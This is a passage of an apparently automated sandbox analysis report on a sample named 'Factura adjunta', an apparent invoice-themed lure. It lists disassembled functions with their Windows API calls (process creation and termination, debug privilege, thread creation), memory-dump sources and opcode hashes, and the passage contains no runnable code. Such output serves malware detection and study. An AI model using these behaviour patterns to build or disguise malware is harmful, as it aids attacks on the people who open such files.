                            • SelectObject.GDI32(00000000,00000000), ref: 007ECFB8
                            • ReleaseDC.USER32(?,00000000), ref: 007ECFC0
                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007ED04B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: 929f27f2bde6360e4f5f87f4f44c8595633319bddf63c0d33c0ee095201b4548
                            • Instruction ID: 409288f8d000adb2eb32bdfe07ebe5a81eb493d893c77665724bcfc2a23f475b
                            • Opcode Fuzzy Hash: 929f27f2bde6360e4f5f87f4f44c8595633319bddf63c0d33c0ee095201b4548
                            • Instruction Fuzzy Hash: 8C710331402244DFCF218F65C888AEA3BB6FF4C360F184269FD559A2A6D739CC52DB61
                            Function 00836FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00837093
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 008370A7
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008370C1
                            • _wcscat.LIBCMT ref: 0083711C
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00837133
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00837161
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: -----$SysListView32
                            • API String ID: 307300125-3975388722
                            • Opcode ID: 5b6c5d4cb737a445819000cdfe8ecc60a9e94b3dcbe0a0dff6929a47f087e753
                            • Instruction ID: 47aaa9318d8f65e8ebd6935fa897f3b34b94caa89ca3c9c7b455dfbe2cb37814
                            • Opcode Fuzzy Hash: 5b6c5d4cb737a445819000cdfe8ecc60a9e94b3dcbe0a0dff6929a47f087e753
                            • Instruction Fuzzy Hash: 5A41A3B1904308EBEB319F64CC85BEE77A8FF48354F10092AF944E7292D675DD848B90
                            Function 0083653C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0083655B
                            • GetWindowLongW.USER32(00E92968,000000F0), ref: 0083658E
                            • GetWindowLongW.USER32(00E92968,000000F0), ref: 008365C3
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008365F5
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0083661F
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00836630
                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0083664A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID: h)
                            • API String ID: 2178440468-3328819710
                            • Opcode ID: 195a294ac8fda939f03a13c75db0bfd259fac41356eb9f99d089317232eeb22c
                            • Instruction ID: 1c2c183d788968c48369281739ebd04e380ead2c59c401fcc88aa44fc30ef41e
                            • Opcode Fuzzy Hash: 195a294ac8fda939f03a13c75db0bfd259fac41356eb9f99d089317232eeb22c
                            • Instruction Fuzzy Hash: E831F230A04110AFDB218F18DC89F553BE1FB9A350F184178F605CB2B6EB71E8A4DB81
                            Function 0082F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0082F9C9
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0082FB5C
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0082FB80
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0082FBC0
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0082FBE2
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0082FD5E
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0082FD90
                            • CloseHandle.KERNEL32(?), ref: 0082FDBF
                            • CloseHandle.KERNEL32(?), ref: 0082FE36
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 73836b3b7c9e120173e41fbee6ce3dac602880d48c1e8142ff0e9a0a01406c39
                            • Instruction ID: e4d0211b4f54c4ccdc81fb94d8f09a6520f1fb5ee0c83359be326c51853e82c1
                            • Opcode Fuzzy Hash: 73836b3b7c9e120173e41fbee6ce3dac602880d48c1e8142ff0e9a0a01406c39
                            • Instruction Fuzzy Hash: 7CE17A31204211DFCB14EF24D485A6ABBF5FF84314F14896DFA9A8B2A2DB34DC85CB52
                            Function 00814F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008138D3,?), ref: 008148C7
                              • Part of subcall function 008148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008138D3,?), ref: 008148E0
                              • Part of subcall function 00814CD3: GetFileAttributesW.KERNEL32(?,00813947), ref: 00814CD4
                            • lstrcmpiW.KERNEL32(?,?), ref: 00814FE2
                            • _wcscmp.LIBCMT ref: 00814FFC
                            • MoveFileW.KERNEL32(?,?), ref: 00815017
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                            • String ID:
                            • API String ID: 793581249-0
                            • Opcode ID: 80b7661d28a2a59abe9bc81a30f24805a07b810d4dad4b48acd036ddbdf898e0
                            • Instruction ID: 2fc3b03114c880416949fc5d6c73a6f90ae34e9e985dfba0496eeb8d5d6bb764
                            • Opcode Fuzzy Hash: 80b7661d28a2a59abe9bc81a30f24805a07b810d4dad4b48acd036ddbdf898e0
                            • Instruction Fuzzy Hash: 665175B2408785DBC724EBA4D8859DFB3ECEF84300F10492EB189D3152EF75A689C766
                            Function 007B2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007EC547
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007EC569
                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007EC581
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007EC59F
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007EC5C0
                            • DestroyCursor.USER32(00000000), ref: 007EC5CF
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007EC5EC
                            • DestroyCursor.USER32(?), ref: 007EC5FB
                              • Part of subcall function 0083A71E: DeleteObject.GDI32(00000000), ref: 0083A757
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                            • String ID:
                            • API String ID: 2975913752-0
                            • Opcode ID: ef5887bde9919d133f8e5c2c0ceb67b4723e07ea5a071211c4cf236731c28294
                            • Instruction ID: 937c1b8352f99d87946804fce2b508291ec6ee7511e2f6f411e3c5b7b8e0f603
                            • Opcode Fuzzy Hash: ef5887bde9919d133f8e5c2c0ceb67b4723e07ea5a071211c4cf236731c28294
                            • Instruction Fuzzy Hash: 32518D74A01205AFDB24DF25CC45FAA3BB5FB58350F100528F90697291EB74ED92DB50
                            Function 00808E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00808A84,00000B00,?,?), ref: 00808E0C
                            • RtlAllocateHeap.NTDLL(00000000,?,00808A84), ref: 00808E13
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00808A84,00000B00,?,?), ref: 00808E28
                            • GetCurrentProcess.KERNEL32(?,00000000,?,00808A84,00000B00,?,?), ref: 00808E30
                            • DuplicateHandle.KERNEL32(00000000,?,00808A84,00000B00,?,?), ref: 00808E33
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00808A84,00000B00,?,?), ref: 00808E43
                            • GetCurrentProcess.KERNEL32(00808A84,00000000,?,00808A84,00000B00,?,?), ref: 00808E4B
                            • DuplicateHandle.KERNEL32(00000000,?,00808A84,00000B00,?,?), ref: 00808E4E
                            • CreateThread.KERNEL32(00000000,00000000,00808E74,00000000,00000000,00000000), ref: 00808E68
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                            • String ID:
                            • API String ID: 1422014791-0
                            • Opcode ID: a5b3481d38954adff960d1d0c03ecb68d044cde39385874597eb69e2ae3f01fd
                            • Instruction ID: d87e5ee2661a085858743f849822fc5bc6bfee7f4d1cae324f13283836003ce9
                            • Opcode Fuzzy Hash: a5b3481d38954adff960d1d0c03ecb68d044cde39385874597eb69e2ae3f01fd
                            • Instruction Fuzzy Hash: E201AC75640304FFE611AB65EC49F5B3B6CFB89711F004421FA05DB1A1CA7498049A60
                            Function 0082EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00813E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00813EB6
                              • Part of subcall function 00813E91: Process32FirstW.KERNEL32(00000000,?), ref: 00813EC4
                              • Part of subcall function 00813E91: CloseHandle.KERNEL32(00000000), ref: 00813F8E
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082ECB8
                            • GetLastError.KERNEL32 ref: 0082ECCB
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082ECFA
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0082ED77
                            • GetLastError.KERNEL32(00000000), ref: 0082ED82
                            • CloseHandle.KERNEL32(00000000), ref: 0082EDB7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            • Opcode ID: 5a8f67ed728e18fb41bf49832b6ee1e8b033d39b15f5b7664216f2c7318a4eb5
                            • Instruction ID: 7bf9b4161c23256b1b19e74cf2d2e1f151e87c8e88e104a7b5caf85b15d40975
                            • Opcode Fuzzy Hash: 5a8f67ed728e18fb41bf49832b6ee1e8b033d39b15f5b7664216f2c7318a4eb5
                            • Instruction Fuzzy Hash: 4D41AD712002109FDB10EF28DC95FADB7A5FF80714F08841DFA469B2D2DB78A854CB96
                            Function 00837500 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00837519
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008375C0
                            • IsMenu.USER32(?), ref: 008375D8
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00837620
                            • DrawMenuBar.USER32 ref: 00837633
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert_memset
                            • String ID: 0$h)
                            • API String ID: 3866635326-2843282415
                            • Opcode ID: 3337bf1579156a418ce7c8ae3f7c4ae161895a1f37383b0ee4ece7d284ea6e40
                            • Instruction ID: b9d80d04a7b2539be7bb47d732e9a194023bdc0e48acf059de286c579788ff24
                            • Opcode Fuzzy Hash: 3337bf1579156a418ce7c8ae3f7c4ae161895a1f37383b0ee4ece7d284ea6e40
                            • Instruction Fuzzy Hash: DE4135B5A05608EFDB20DF54D895E9ABBB8FB48314F048129E919E7261E730ED50CFA0
                            Function 00813226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadIconW.USER32(00000000,00007F03), ref: 008132C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            • Opcode ID: 8f18420c63f64b5adbff4e62a05defcad1d6d322a61452d81cb3509a3fabfd43
                            • Instruction ID: 8250126a90fea3f7524e1c1c5aa37242bd210dc562c4b072a8eb66ba73585fce
                            • Opcode Fuzzy Hash: 8f18420c63f64b5adbff4e62a05defcad1d6d322a61452d81cb3509a3fabfd43
                            • Instruction Fuzzy Hash: B8112B3164934BBBA7056B54DC43CEAB3ACFF19375F10002AF504E6381D67A5F8049A5
                            Function 00828BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00828BEC
                            • CoInitialize.OLE32(00000000), ref: 00828C19
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00828D23
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00828E50
                            • CoGetObject.OLE32(?,00000000,00842C0C,?), ref: 00828EA7
                            • SetErrorMode.KERNEL32(00000000), ref: 00828EBA
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00828F3A
                            • VariantClear.OLEAUT32(?), ref: 00828F4A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                            • String ID:
                            • API String ID: 2437601815-0
                            • Opcode ID: ddebb2d2a616ca648f3dc8dfa55bdf4829bb7f7b703789b211dd6be395716941
                            • Instruction ID: e904887d6440ab63476fd4206226c7f11981a0c32dcee89c96b4510e2de462c8
                            • Opcode Fuzzy Hash: ddebb2d2a616ca648f3dc8dfa55bdf4829bb7f7b703789b211dd6be395716941
                            • Instruction Fuzzy Hash: A4C11271608215EFDB00DF68D884A2AB7E9FF88348F00492DF699DB261DB31ED45CB52
                            Function 00814534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0081454E
                            • LoadStringW.USER32(00000000), ref: 00814555
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0081456B
                            • LoadStringW.USER32(00000000), ref: 00814572
                            • _wprintf.LIBCMT ref: 00814598
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008145B6
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 00814593
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            • Opcode ID: 91a6fdc85b17253bbf83fec580bcab45afd9db60633d9e40e3b120a07cacae0c
                            • Instruction ID: d7adc46429dc3ccfece7e143928c74507cc181d71a609afff3d0fdfaf49df367
                            • Opcode Fuzzy Hash: 91a6fdc85b17253bbf83fec580bcab45afd9db60633d9e40e3b120a07cacae0c
                            • Instruction Fuzzy Hash: B20167F2900208BFE7519795DD89EEB776CFB48301F0009A5BB45D2152EA745E854BB1
                            Function 007B2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007EC417,00000004,00000000,00000000,00000000), ref: 007B2ACF
                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007EC417,00000004,00000000,00000000,00000000,000000FF), ref: 007B2B17
                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007EC417,00000004,00000000,00000000,00000000), ref: 007EC46A
                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007EC417,00000004,00000000,00000000,00000000), ref: 007EC4D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            • Opcode ID: ff7e7bbb10ec66f3ef1c1137ce3608e0e5ec6d615657c0e6941911baa4d0dca3
                            • Instruction ID: 7564f7505e0be72d0171a3709ac8dc35db76bd1a952d0aa0197559bffb619334
                            • Opcode Fuzzy Hash: ff7e7bbb10ec66f3ef1c1137ce3608e0e5ec6d615657c0e6941911baa4d0dca3
                            • Instruction Fuzzy Hash: DA412F316066C0AAC7355B298C9CBF77F91BB96300F24C81DE547865A3D63D9843D751
                            Function 00817368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0081737F
                              • Part of subcall function 007D0FF6: std::exception::exception.LIBCMT ref: 007D102C
                              • Part of subcall function 007D0FF6: __CxxThrowException@8.LIBCMT ref: 007D1041
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008173B6
                            • RtlEnterCriticalSection.NTDLL(?), ref: 008173D2
                            • _memmove.LIBCMT ref: 00817420
                            • _memmove.LIBCMT ref: 0081743D
